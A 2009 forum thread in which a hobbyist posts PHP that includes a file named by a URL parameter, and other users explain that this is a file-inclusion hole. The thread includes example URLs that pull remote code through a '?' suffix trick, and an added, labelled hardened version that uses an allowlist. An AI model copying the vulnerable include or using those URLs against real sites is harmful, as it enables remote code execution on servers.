Wickham Posted August 11, 2009 (edited)

I've been told about a PHP code that allows an include file to show something on the same page only after a link is clicked; it's better than Javascript because it works when javascript is disabled and the code is very small:

http://www.wickham43.com/test/php-show-form.php

Form 1

<?php error_reporting(0); include ($_GET['f'].".inc"); ?>

and the form1.inc just has the form code. At first I was trying it without error_reporting(0); but although it worked I got several warnings on the online page that showed on the page:

Warning: include(.inc) [function.include]: failed to open stream: No such file or directory in /home/my-username/public_html/sub-directory/php-show-form.php on line 25
Warning: include(.inc) [function.include]: failed to open stream: No such file or directory in /home/my-username/public_html/sub-directory/php-show-form.php on line 25
Warning: include() [function.include]: Failed opening '.inc' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/my-username/public_html/sub-directory/php-show-form.php on line 25

Line 25 was

<?php include ($_GET['f'].".inc");?>

The warnings for the same page in WampServer were:

Notice: Undefined index: f in C:\wamp\www\test\php-show-form.php on line 25
Warning: include(.inc) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test\php-show-form.php on line 25
Warning: include() [function.include]: Failed opening '.inc' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test\php-show-form.php on line 25

Is it expecting a variable somewhere? Is there better code without warnings? I've also tried

Form 1

<?php include ($_GET[f]);?>

where the .inc is in the link instead of the include, which also works but I still get warnings, just one less warning.
EDIT: I've just got an answer from the guy who told me the code (he had to work it out):

Form 1

<?php if ($_GET['f']) {include ($_GET['f'].".inc");} ?>

error_reporting(0); not required. As an extra question, why and what is f? If I substitute g or id it doesn't work, so f must be a PHP operator and it's not a variable. Where can I find out what its features are?

Edited August 14, 2009 by Wickham
dms Posted August 12, 2009

Just learning PHP myself, but I do remember reading something about setting the include_path in the php.ini file. Maybe this is something worth looking into. I would think that [f] would be the index or key within the $_GET array, which is a variable, so you may try placing double quotes around it. This is a bit over my head. Good luck.
falkencreative Posted August 12, 2009

"f" is a variable in the url:

Form 1

In this case, f = "form1.inc"

The "f" variable doesn't have to be called "f"; it could easily be "include" or something else you specified. In that case though, you'd need to update the code:

Form 1

and

<?php if ($_GET['include']) {include ($_GET['include'].".inc");} ?>
dms Posted August 13, 2009

You must have 'f' set to 0 (f=0) in your php script or not set at all. Then you must have an if statement to where... if('f'=form1) the form is included in the page. So, within the link you are resending 'f' through the super global $_GET and setting the value to 'form1', which would include the form within the page. Try this: click on your Form 1 link to display the form and then in the url change [?f=form1] to [?f=0] and see what happens. The page will be redisplayed without the form, because 'f' was reset to false, which would cause the if statement not to elevate to true, so the form will not be displayed. I believe that [f] is the key in the $_GET array which corresponds to the variable $f in your php code. I hope this is making sense, because I'm just learning this myself.
ASDx Posted August 14, 2009

I was just surfing and I saw your question .... and I want to advise you: think, if someone discovers your url and changes it to this http://www.wickham43.com/test/php-show-form.php?f=dangercode.gif? you will be hacked directly ... so you have to include your file directly instead of getting it on the fly, or use an array of the safe file names to be included.
Wickham Posted August 14, 2009 (edited)

Thanks for the warning. I had included error_reporting(0); in my first attempt but deleted it when I got the correct code, thinking it wasn't necessary, but I've now put it back in and it stops anyone from seeing the username now (unless there is another way to get someone's username). I had noticed that my username showed in the warning messages for everyone to see, but not the password. However, it's obviously not a good idea to show the username in a warning message. Tell me if you can still see my username with this revised page:

http://www.wickham43.com/test/php-show-form.php

Edited August 14, 2009 by Wickham
falkencreative Posted August 14, 2009

The issue is not that your username will show up. The issue is that the user could modify the URL to include files you did not originally intend to be included. They could try to show other files on your server, or even link their own php scripts like so:

filename2.php?f=http://www.theirsite.com/theirfile.com
Wickham Posted August 14, 2009 (edited)

I've just tried to do what you mentioned, adding another of my website addresses to the f= instead of the "include" file that I had, and it didn't do anything, just showed the page with the link and nothing included below. Perhaps it's because I now have error_reporting(0); in the PHP code, but also because the PHP code adds .inc on the end of whatever is after f=, so a full url would have .inc added and be a 404 "not found" if it was partly successful. It would show any other .inc file that I might have in the same directory, but there is only one and someone would have to guess its name. However, I really only experimented with the code to learn some more PHP. If it's dangerous code, what do the experts use to open another file in the same web page from a link (apart from Ajax), or can the code be modified?

Edited August 14, 2009 by Wickham
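A hardened version of the page, added here as an example; it is not code from the thread or from wickham43.com. It implements the "array of the safe file names" approach ASDx suggested and answers the question of whether the code can be modified: the value of f is never used as a path, only as a key into a fixed map, so a value that is a URL, another file name or a path with ../ simply fails the lookup. The names FRAGMENTS, FRAGMENT_DIR and resolveFragment, and the location of the includes directory, are assumptions made for the illustration.

```php
<?php
// Added example (not from the thread). Hardened replacement for
//   include($_GET['f'] . ".inc");
// The request parameter is never used as a path; it is only a key into a
// fixed map of files this page is allowed to include.

declare(strict_types=1);

// Assumption: the includable fragments live in a directory outside the web
// root so they cannot be fetched directly. Adjust the path for your host.
const FRAGMENT_DIR = __DIR__ . '/../includes';

// Key as it appears in the URL => file on disk. Adding a new form means
// adding a line here; nothing a visitor types can add one.
const FRAGMENTS = [
    'form1' => 'form1.inc',
    'form2' => 'form2.inc',
];

/**
 * Resolve the ?f= value to an absolute path, or null if it is not allowed.
 * Unknown keys, URLs, "../", null bytes and query-string tricks all fail,
 * because only exact keys of FRAGMENTS are accepted.
 */
function resolveFragment(?string $key): ?string
{
    if ($key === null || !array_key_exists($key, FRAGMENTS)) {
        return null;
    }
    $base = realpath(FRAGMENT_DIR);
    $path = realpath(FRAGMENT_DIR . '/' . FRAGMENTS[$key]);
    // Belt and braces: the resolved file must still be inside FRAGMENT_DIR.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Never show raw PHP warnings to visitors (they leak paths and usernames,
// as seen in the thread); keep them in the server log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// ?f[]=x would arrive as an array; treat anything that is not a string as absent.
$raw = $_GET['f'] ?? null;
$fragment = is_string($raw) ? resolveFragment($raw) : null;
?>
<!DOCTYPE html>
<html>
<head><meta charset="utf-8"><title>Show a form after a link is clicked</title></head>
<body>
<p>
  <a href="?f=form1">Form 1</a> |
  <a href="?f=form2">Form 2</a>
</p>
<?php if ($fragment !== null): ?>
  <?php include $fragment; ?>
<?php elseif ($raw !== null): ?>
  <p>Unknown form.</p>
<?php endif; ?>
</body>
</html>
```

The appended ".inc" in the original snippet is not a protection: it is added after whatever the visitor supplied, so it limits nothing about which file is named, and the thread already shows one way it can be neutralised. The allowlist is what makes the difference, and `display_errors` off with `log_errors` on keeps the path and username out of the page while still recording failed includes where an administrator can review them.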
ASDx Posted August 14, 2009

If someone included a file from a remote website followed by ?, it will completely ignore anything after the dangerous code. For example http://www.wickham43.com/test/php-show-form.phpf=http://s.rr/php_with_some_unix_commands.txt? it will be http://www.wickham43.com/test/php-show-form.php?f=http://h.sr/php_with_some_unix_commands.txt?.inc and everything after ? is ignored, so your .inc will be treated as a part of the query string.
dms Posted August 14, 2009 (edited)

Since this method is being used to retrieve a form, not submit one, I don't understand how someone could inject something into the 'url' after the fact.

Edited August 16, 2009 by dms